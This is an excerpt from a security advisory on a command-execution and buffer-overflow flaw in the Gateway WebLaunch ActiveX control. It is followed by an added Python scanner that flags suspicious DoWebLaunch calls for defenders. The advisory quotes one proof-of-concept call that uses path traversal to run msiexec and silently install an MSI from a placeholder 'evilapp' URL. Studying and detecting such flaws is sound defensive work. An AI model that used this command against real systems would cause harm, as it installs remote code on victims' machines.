Gateway CWebLaunchCtl ActiveX Control Command Execution and Remote Buffer Overflow Vulnerability
The following example call to the vulnerable method demonstrates executing a local script:

    obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe", "","/i http://www.example.com/evilapp.msi /quiet");

UPDATE (March 26, 2008): The Symantec DeepSight Team has discovered that the issue affecting 'WebLaunch2.ocx' is being actively exploited in the wild.

A proof of concept for executing local scripts and an exploit for the buffer-overflow issue are available:
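
For defenders, the following added example (not part of the original advisory, and not the proof of concept or exploit it mentions) scans captured page content for DoWebLaunch calls and flags string arguments that contain path traversal, a remote URL, or unusual length. The sample input is constructed, and the 512-character threshold is an assumption, since the advisory gives no overflow length.

```python
import re

# Constructed sample of captured page content; the first call is the one quoted in the advisory.
SAMPLE = r'''
<script>
var obj = document.getElementById("ctl");
obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe", "","/i http://www.example.com/evilapp.msi /quiet");
obj.DoWebLaunch("", "support\\launcher.exe", "", "");
</script>
'''

CALL = re.compile(r'\.DoWebLaunch\s*\(', re.IGNORECASE)              # method named in the advisory
STRING = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')   # quoted JS string literal
TRAVERSAL = re.compile(r'\.\.[\\/]')                                 # ..\ or ../
URL = re.compile(r'https?://', re.IGNORECASE)
MAX_ARG_LEN = 512  # assumed threshold; the advisory gives no overflow length

def literal_args(text, pos):
    """Collect string-literal arguments from pos up to the ')' that closes the call."""
    args = []
    while pos < len(text) and text[pos] != ')':
        m = STRING.match(text, pos)
        if m:  # consume the whole literal, so a ')' inside a string does not end the scan
            raw = m.group(1) if m.group(1) is not None else m.group(2)
            args.append(re.sub(r'\\(.)', r'\1', raw))  # undo simple backslash escapes
            pos = m.end()
        else:
            pos += 1
    return args

def scan(text):
    """Return (line_number, findings) for every DoWebLaunch call found in text."""
    results = []
    for call in CALL.finditer(text):
        args = literal_args(text, call.end())
        findings = []
        for n, arg in enumerate(args, 1):
            if TRAVERSAL.search(arg):
                findings.append(f"arg{n}: path traversal")
            if URL.search(arg):
                findings.append(f"arg{n}: remote URL")
            if len(arg) > MAX_ARG_LEN:
                findings.append(f"arg{n}: {len(arg)} chars")
        results.append((text.count("\n", 0, call.start()) + 1, findings))
    return results

if __name__ == "__main__":
    for line, findings in scan(SAMPLE):
        print(line, findings or "no findings")
```

Arguments built from variables or string concatenation are not string literals and produce no findings, so a call reported with an empty list still deserves a manual look.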